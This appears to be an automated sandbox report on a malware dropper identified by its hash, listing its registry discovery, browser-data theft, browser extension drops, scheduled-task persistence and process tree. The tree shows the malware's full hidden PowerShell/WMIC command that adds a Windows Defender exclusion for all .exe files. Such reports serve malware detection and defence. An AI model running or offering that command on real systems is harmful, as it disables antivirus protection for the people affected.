57f939034957cdb82a2760820bb650568ee0699171f48363f9e444c374a05c0d

System Information Discovery

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	Install.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	rundll32.exe

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

System Information Discovery

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-268080393-3149932598-1824759070-1000\Control Panel\International\Geo\Nation	JyKDiOp.exe

Executes dropped EXE 4 IoCs

pid	Process
3004	Install.exe
2144	Install.exe
2472	tgOgpoU.exe
2228	JyKDiOp.exe

Loads dropped DLL 23 IoCs

pid	Process
2848	57f939034957cdb82a2760820bb650568ee0699171f48363f9e444c374a05c0d.exe
3004	Install.exe
3004	Install.exe
3004	Install.exe
3004	Install.exe
2144	Install.exe
2144	Install.exe
2144	Install.exe
2116	WerFault.exe
2116	WerFault.exe
2116	WerFault.exe
2340	rundll32.exe
2340	rundll32.exe
2340	rundll32.exe
2340	rundll32.exe
316	WerFault.exe
316	WerFault.exe
316	WerFault.exe
316	WerFault.exe
316	WerFault.exe
1284	WerFault.exe
1284	WerFault.exe
1284	WerFault.exe

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012

Drops Chrome extension 2 IoCs

description	ioc	Process
File created	C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\oikgcnjambfooaigmdljblbaeelmekem\1.0.0.0\manifest.json	JyKDiOp.exe
File created	C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\gfcdbodapcbfckbfpmgeldfkkgjknceo\1.2.0_0\manifest.json	JyKDiOp.exe

Drops file in System32 directory 24 IoCs

description	ioc	Process
File opened for modification	C:\Windows\system32\GroupPolicy\gpt.ini	tgOgpoU.exe
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.EXE
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\counters.dat	JyKDiOp.exe
File created	C:\Windows\system32\GroupPolicy\Machine\Registry.pol	tgOgpoU.exe
File created	C:\Windows\system32\GroupPolicy\gpt.ini	tgOgpoU.exe
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.EXE
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.EXE
File opened for modification	\??\c:\windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA	JyKDiOp.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\05DDC6AA91765AACACDB0A5F96DF8199	JyKDiOp.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\B3513D73A177A2707D910183759B389B_76B4AC942398240FF309817636D6DBC9	JyKDiOp.exe
File opened for modification	\??\c:\windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\B3513D73A177A2707D910183759B389B_76B4AC942398240FF309817636D6DBC9	JyKDiOp.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\05DDC6AA91765AACACDB0A5F96DF8199	JyKDiOp.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\DDE8B1B7E253A9758EC380BD648952AF_A3D4688236962EEA03574DE4F61B95D9	JyKDiOp.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\DDE8B1B7E253A9758EC380BD648952AF_A3D4688236962EEA03574DE4F61B95D9	JyKDiOp.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\B3513D73A177A2707D910183759B389B_D55A76EA86A3695733B952639E5D4848	JyKDiOp.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\counters.dat	rundll32.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA	JyKDiOp.exe
File opened for modification	\??\c:\windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	\??\c:\windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	C:\Windows\system32\GroupPolicy\Machine\Registry.pol	JyKDiOp.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\B3513D73A177A2707D910183759B389B_D55A76EA86A3695733B952639E5D4848	JyKDiOp.exe
File opened for modification	C:\Windows\system32\GroupPolicy\Machine\Registry.pol	tgOgpoU.exe

Drops file in Program Files directory 13 IoCs

description	ioc	Process
File opened for modification	C:\Program Files\Mozilla Firefox\browser\features\{469DEDC5-791B-41B7-99CA-EB25B08298D1}.xpi	JyKDiOp.exe
File created	C:\Program Files (x86)\VcCVDDBRU\VVBajwS.xml	JyKDiOp.exe
File created	C:\Program Files (x86)\DcwzooFfPwZYrvRkwnR\KyHeSQO.dll	JyKDiOp.exe
File created	C:\Program Files\Mozilla Firefox\browser\features\{469DEDC5-791B-41B7-99CA-EB25B08298D1}.xpi	JyKDiOp.exe
File created	C:\Program Files (x86)\ATiuMetuMWHU2\SunBWXR.xml	JyKDiOp.exe
File created	C:\Program Files (x86)\DcwzooFfPwZYrvRkwnR\jaKjrah.xml	JyKDiOp.exe
File created	C:\Program Files (x86)\UyPATDbiwjgOC\blIehCe.xml	JyKDiOp.exe
File created	C:\Program Files\Mozilla Firefox\browser\omni.ja.bak	JyKDiOp.exe
File created	C:\Program Files (x86)\ATiuMetuMWHU2\hDmySLvUUGMVf.dll	JyKDiOp.exe
File created	C:\Program Files (x86)\VcCVDDBRU\DyLUGV.dll	JyKDiOp.exe
File opened for modification	C:\Program Files\Mozilla Firefox\browser\omni.ja	JyKDiOp.exe
File created	C:\Program Files (x86)\UyPATDbiwjgOC\yRrrnvz.dll	JyKDiOp.exe
File created	C:\Program Files (x86)\IchmcMfQaXUn\tklAOFS.dll	JyKDiOp.exe

Drops file in Windows directory 4 IoCs

description	ioc	Process
File created	C:\Windows\Tasks\bmQWCxleEgxbTUrSZz.job	schtasks.exe
File created	C:\Windows\Tasks\nsbPTSdSgPuDRRbhc.job	schtasks.exe
File created	C:\Windows\Tasks\RShenKKeUbJzTjI.job	schtasks.exe
File created	C:\Windows\Tasks\ROHimGgVjIIdgMKwK.job	schtasks.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Program crash 3 IoCs

pid	pid_target	Process	procid_target
2116	2472	WerFault.exe	41
316	2144	WerFault.exe	29
1284	2228	WerFault.exe	185

Enumerates system info in registry 2 TTPs 4 IoCs

Query Registry

System Information Discovery

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	Install.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	Install.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	rundll32.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	rundll32.exe

Modifies data under HKEY_USERS 64 IoCs

description	ioc	Process
Set value (int)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ProxyEnable = "0"	JyKDiOp.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings	rundll32.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "1"	tgOgpoU.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\Root\CRLs	JyKDiOp.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Shell Extensions\Cached	tgOgpoU.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000	JyKDiOp.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content\CachePrefix	rundll32.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{66AAA448-8751-48C8-A475-36AD1E9C25A6}\32-ee-0b-4f-68-e6	rundll32.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies\CachePrefix = "Cookie:"	JyKDiOp.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\DefaultConnectionSettings = 4600000003000000090000000000000000000000000000000400000000000000000000000000000000000000000000000000000001000000020000000a7f0099000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000	JyKDiOp.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\32-ee-0b-4f-68-e6\WpadDecisionReason = "1"	JyKDiOp.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	wscript.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{66AAA448-8751-48C8-A475-36AD1E9C25A6}\WpadNetworkName = "Network 3"	JyKDiOp.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\CA\Certificates	JyKDiOp.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections	JyKDiOp.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\My	JyKDiOp.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\Root\Certificates	JyKDiOp.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople	JyKDiOp.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs	JyKDiOp.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\32-ee-0b-4f-68-e6	JyKDiOp.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\Root\CTLs	JyKDiOp.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings	rundll32.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\32-ee-0b-4f-68-e6\WpadDecision = "0"	rundll32.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{66AAA448-8751-48C8-A475-36AD1E9C25A6}\WpadDecision = "0"	JyKDiOp.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\trust\Certificates	JyKDiOp.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\DefaultConnectionSettings = 4600000002000000090000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000	JyKDiOp.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	JyKDiOp.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{66AAA448-8751-48C8-A475-36AD1E9C25A6}\WpadDecisionReason = "1"	JyKDiOp.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History\CachePrefix = "Visited:"	rundll32.exe
Key created	\REGISTRY\USER\.DEFAULT\Software	wscript.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content\CachePrefix	JyKDiOp.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\trust\CRLs	JyKDiOp.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\CA\Certificates	JyKDiOp.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA	JyKDiOp.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\CA\CRLs	JyKDiOp.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed	JyKDiOp.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\trust\CTLs	JyKDiOp.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{66AAA448-8751-48C8-A475-36AD1E9C25A6}\WpadDecisionTime = e09ec3fa62ceda01	JyKDiOp.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root	JyKDiOp.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\trust\CTLs	JyKDiOp.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "0"	wscript.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\trust\CRLs	JyKDiOp.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople	JyKDiOp.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs	JyKDiOp.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections	rundll32.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "1"	wscript.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\SavedLegacySettings = 4600000002000000090000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000	JyKDiOp.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\32-ee-0b-4f-68-e6\WpadDecisionTime = e09ec3fa62ceda01	rundll32.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\32-ee-0b-4f-68-e6\WpadDetectedUrl	rundll32.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage\StartMenu_Start_Time = 80b687e862ceda01	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\CA\CRLs	JyKDiOp.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "0"	JyKDiOp.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA	JyKDiOp.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\CA\CTLs	JyKDiOp.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings	JyKDiOp.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\32-ee-0b-4f-68-e6\WpadDecisionTime = e09ec3fa62ceda01	JyKDiOp.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\Certificates	JyKDiOp.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\SmartCardRoot\CRLs	JyKDiOp.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\TrustedPeople\Certificates	JyKDiOp.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\32-ee-0b-4f-68-e6	rundll32.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\CA\CTLs	JyKDiOp.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\CRLs	JyKDiOp.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\trust\Certificates	JyKDiOp.exe

Scheduled Task/Job: Scheduled Task 1 TTPs 12 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence execution

Scheduled Task

pid	Process
2836	schtasks.exe
2520	schtasks.exe
2808	schtasks.exe
2872	schtasks.exe
1412	schtasks.exe
1284	schtasks.exe
2608	schtasks.exe
2568	schtasks.exe
2708	schtasks.exe
2200	schtasks.exe
2600	schtasks.exe
1516	schtasks.exe

Suspicious behavior: EnumeratesProcesses 30 IoCs

pid	Process
2788	powershell.exe
2256	powershell.EXE
2256	powershell.EXE
2256	powershell.EXE
1376	powershell.EXE
1376	powershell.EXE
1376	powershell.EXE
1688	powershell.exe
2084	powershell.EXE
2084	powershell.EXE
2084	powershell.EXE
2228	JyKDiOp.exe
2228	JyKDiOp.exe
2228	JyKDiOp.exe
2228	JyKDiOp.exe
2228	JyKDiOp.exe
2036	powershell.exe
2228	JyKDiOp.exe
2228	JyKDiOp.exe
2228	JyKDiOp.exe
2068	powershell.exe
2228	JyKDiOp.exe
2228	JyKDiOp.exe
2228	JyKDiOp.exe
2228	JyKDiOp.exe
2228	JyKDiOp.exe
2228	JyKDiOp.exe
2228	JyKDiOp.exe
2228	JyKDiOp.exe
2228	JyKDiOp.exe

Suspicious use of AdjustPrivilegeToken 63 IoCs

description	pid	Process
Token: SeDebugPrivilege	2788	powershell.exe
Token: SeIncreaseQuotaPrivilege	2756	WMIC.exe
Token: SeSecurityPrivilege	2756	WMIC.exe
Token: SeTakeOwnershipPrivilege	2756	WMIC.exe
Token: SeLoadDriverPrivilege	2756	WMIC.exe
Token: SeSystemProfilePrivilege	2756	WMIC.exe
Token: SeSystemtimePrivilege	2756	WMIC.exe
Token: SeProfSingleProcessPrivilege	2756	WMIC.exe
Token: SeIncBasePriorityPrivilege	2756	WMIC.exe
Token: SeCreatePagefilePrivilege	2756	WMIC.exe
Token: SeBackupPrivilege	2756	WMIC.exe
Token: SeRestorePrivilege	2756	WMIC.exe
Token: SeShutdownPrivilege	2756	WMIC.exe
Token: SeDebugPrivilege	2756	WMIC.exe
Token: SeSystemEnvironmentPrivilege	2756	WMIC.exe
Token: SeRemoteShutdownPrivilege	2756	WMIC.exe
Token: SeUndockPrivilege	2756	WMIC.exe
Token: SeManageVolumePrivilege	2756	WMIC.exe
Token: 33	2756	WMIC.exe
Token: 34	2756	WMIC.exe
Token: 35	2756	WMIC.exe
Token: SeDebugPrivilege	2256	powershell.EXE
Token: SeDebugPrivilege	1376	powershell.EXE
Token: SeDebugPrivilege	1688	powershell.exe
Token: SeAssignPrimaryTokenPrivilege	2136	WMIC.exe
Token: SeIncreaseQuotaPrivilege	2136	WMIC.exe
Token: SeSecurityPrivilege	2136	WMIC.exe
Token: SeTakeOwnershipPrivilege	2136	WMIC.exe
Token: SeLoadDriverPrivilege	2136	WMIC.exe
Token: SeSystemtimePrivilege	2136	WMIC.exe
Token: SeBackupPrivilege	2136	WMIC.exe
Token: SeRestorePrivilege	2136	WMIC.exe
Token: SeShutdownPrivilege	2136	WMIC.exe
Token: SeSystemEnvironmentPrivilege	2136	WMIC.exe
Token: SeUndockPrivilege	2136	WMIC.exe
Token: SeManageVolumePrivilege	2136	WMIC.exe
Token: SeDebugPrivilege	2084	powershell.EXE
Token: SeDebugPrivilege	2036	powershell.exe
Token: SeAssignPrimaryTokenPrivilege	1320	WMIC.exe
Token: SeIncreaseQuotaPrivilege	1320	WMIC.exe
Token: SeSecurityPrivilege	1320	WMIC.exe
Token: SeTakeOwnershipPrivilege	1320	WMIC.exe
Token: SeLoadDriverPrivilege	1320	WMIC.exe
Token: SeSystemtimePrivilege	1320	WMIC.exe
Token: SeBackupPrivilege	1320	WMIC.exe
Token: SeRestorePrivilege	1320	WMIC.exe
Token: SeShutdownPrivilege	1320	WMIC.exe
Token: SeSystemEnvironmentPrivilege	1320	WMIC.exe
Token: SeUndockPrivilege	1320	WMIC.exe
Token: SeManageVolumePrivilege	1320	WMIC.exe
Token: SeDebugPrivilege	2068	powershell.exe
Token: SeAssignPrimaryTokenPrivilege	1152	WMIC.exe
Token: SeIncreaseQuotaPrivilege	1152	WMIC.exe
Token: SeSecurityPrivilege	1152	WMIC.exe
Token: SeTakeOwnershipPrivilege	1152	WMIC.exe
Token: SeLoadDriverPrivilege	1152	WMIC.exe
Token: SeSystemtimePrivilege	1152	WMIC.exe
Token: SeBackupPrivilege	1152	WMIC.exe
Token: SeRestorePrivilege	1152	WMIC.exe
Token: SeShutdownPrivilege	1152	WMIC.exe
Token: SeSystemEnvironmentPrivilege	1152	WMIC.exe
Token: SeUndockPrivilege	1152	WMIC.exe
Token: SeManageVolumePrivilege	1152	WMIC.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 2848 wrote to memory of 3004	2848	57f939034957cdb82a2760820bb650568ee0699171f48363f9e444c374a05c0d.exe	28
PID 2848 wrote to memory of 3004	2848	57f939034957cdb82a2760820bb650568ee0699171f48363f9e444c374a05c0d.exe	28
PID 2848 wrote to memory of 3004	2848	57f939034957cdb82a2760820bb650568ee0699171f48363f9e444c374a05c0d.exe	28
PID 2848 wrote to memory of 3004	2848	57f939034957cdb82a2760820bb650568ee0699171f48363f9e444c374a05c0d.exe	28
PID 2848 wrote to memory of 3004	2848	57f939034957cdb82a2760820bb650568ee0699171f48363f9e444c374a05c0d.exe	28
PID 2848 wrote to memory of 3004	2848	57f939034957cdb82a2760820bb650568ee0699171f48363f9e444c374a05c0d.exe	28
PID 2848 wrote to memory of 3004	2848	57f939034957cdb82a2760820bb650568ee0699171f48363f9e444c374a05c0d.exe	28
PID 3004 wrote to memory of 2144	3004	Install.exe	29
PID 3004 wrote to memory of 2144	3004	Install.exe	29
PID 3004 wrote to memory of 2144	3004	Install.exe	29
PID 3004 wrote to memory of 2144	3004	Install.exe	29
PID 3004 wrote to memory of 2144	3004	Install.exe	29
PID 3004 wrote to memory of 2144	3004	Install.exe	29
PID 3004 wrote to memory of 2144	3004	Install.exe	29
PID 2144 wrote to memory of 2532	2144	Install.exe	31
PID 2144 wrote to memory of 2532	2144	Install.exe	31
PID 2144 wrote to memory of 2532	2144	Install.exe	31
PID 2144 wrote to memory of 2532	2144	Install.exe	31
PID 2144 wrote to memory of 2532	2144	Install.exe	31
PID 2144 wrote to memory of 2532	2144	Install.exe	31
PID 2144 wrote to memory of 2532	2144	Install.exe	31
PID 2532 wrote to memory of 2808	2532	forfiles.exe	33
PID 2532 wrote to memory of 2808	2532	forfiles.exe	33
PID 2532 wrote to memory of 2808	2532	forfiles.exe	33
PID 2532 wrote to memory of 2808	2532	forfiles.exe	33
PID 2532 wrote to memory of 2808	2532	forfiles.exe	33
PID 2532 wrote to memory of 2808	2532	forfiles.exe	33
PID 2532 wrote to memory of 2808	2532	forfiles.exe	33
PID 2808 wrote to memory of 2788	2808	cmd.exe	34
PID 2808 wrote to memory of 2788	2808	cmd.exe	34
PID 2808 wrote to memory of 2788	2808	cmd.exe	34
PID 2808 wrote to memory of 2788	2808	cmd.exe	34
PID 2808 wrote to memory of 2788	2808	cmd.exe	34
PID 2808 wrote to memory of 2788	2808	cmd.exe	34
PID 2808 wrote to memory of 2788	2808	cmd.exe	34
PID 2788 wrote to memory of 2756	2788	powershell.exe	35
PID 2788 wrote to memory of 2756	2788	powershell.exe	35
PID 2788 wrote to memory of 2756	2788	powershell.exe	35
PID 2788 wrote to memory of 2756	2788	powershell.exe	35
PID 2788 wrote to memory of 2756	2788	powershell.exe	35
PID 2788 wrote to memory of 2756	2788	powershell.exe	35
PID 2788 wrote to memory of 2756	2788	powershell.exe	35
PID 2144 wrote to memory of 2600	2144	Install.exe	36
PID 2144 wrote to memory of 2600	2144	Install.exe	36
PID 2144 wrote to memory of 2600	2144	Install.exe	36
PID 2144 wrote to memory of 2600	2144	Install.exe	36
PID 2144 wrote to memory of 2600	2144	Install.exe	36
PID 2144 wrote to memory of 2600	2144	Install.exe	36
PID 2144 wrote to memory of 2600	2144	Install.exe	36
PID 2028 wrote to memory of 2472	2028	taskeng.exe	41
PID 2028 wrote to memory of 2472	2028	taskeng.exe	41
PID 2028 wrote to memory of 2472	2028	taskeng.exe	41
PID 2028 wrote to memory of 2472	2028	taskeng.exe	41
PID 2472 wrote to memory of 1284	2472	tgOgpoU.exe	42
PID 2472 wrote to memory of 1284	2472	tgOgpoU.exe	42
PID 2472 wrote to memory of 1284	2472	tgOgpoU.exe	42
PID 2472 wrote to memory of 1284	2472	tgOgpoU.exe	42
PID 2472 wrote to memory of 1264	2472	tgOgpoU.exe	44
PID 2472 wrote to memory of 1264	2472	tgOgpoU.exe	44
PID 2472 wrote to memory of 1264	2472	tgOgpoU.exe	44
PID 2472 wrote to memory of 1264	2472	tgOgpoU.exe	44
PID 340 wrote to memory of 2256	340	taskeng.exe	47
PID 340 wrote to memory of 2256	340	taskeng.exe	47
PID 340 wrote to memory of 2256	340	taskeng.exe	47

C:\Users\Admin\AppData\Local\Temp\57f939034957cdb82a2760820bb650568ee0699171f48363f9e444c374a05c0d.exe
"C:\Users\Admin\AppData\Local\Temp\57f939034957cdb82a2760820bb650568ee0699171f48363f9e444c374a05c0d.exe"
1⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:2848
- C:\Users\Admin\AppData\Local\Temp\7zS194B.tmp\Install.exe
  .\Install.exe
  2⤵
  - Executes dropped EXE
  - Loads dropped DLL
  - Suspicious use of WriteProcessMemory
  PID:3004
- - C:\Users\Admin\AppData\Local\Temp\7zS1B2E.tmp\Install.exe
    .\Install.exe /FvdidQpG "525403" /S
    3⤵
    - Checks BIOS information in registry
    - Executes dropped EXE
    - Loads dropped DLL
    - Enumerates system info in registry
    - Suspicious use of WriteProcessMemory
    PID:2144
  - - C:\Windows\SysWOW64\forfiles.exe
      "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m help.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True"
      4⤵
      Suspicious use of WriteProcessMemory
      PID:2532
    - - C:\Windows\SysWOW64\cmd.exe
        
        /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
        5⤵
        Suspicious use of WriteProcessMemory
        
        PID:2808
      - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
        6⤵
        Command and Scripting Interpreter: PowerShell
        Drops file in System32 directory
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of WriteProcessMemory
